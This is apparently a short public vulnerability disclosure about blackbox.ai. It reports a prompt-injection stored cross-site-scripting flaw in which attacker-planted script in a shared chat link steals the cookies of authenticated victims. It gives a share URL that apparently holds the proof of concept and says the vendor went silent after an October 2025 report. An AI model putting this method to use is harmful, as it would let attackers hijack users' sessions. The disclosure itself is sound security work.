A prompt injection stored cross-site-scripting vulnerability has been found in blackbox.ai which allows an attacker to inject XSS code then share it to a victim to steal it's cookies while victim's browser currently authenticated to https://www.blackbox.ai
https://www.blackbox.ai/share/576066de-6268-4dbd-8c51-3dd509eadba4
This was reported to gisele@blackbox.ai in October 2, 2025. They initially respond and says to check on it. However, in spite a series of consistent follow ups, I never heard from them again.
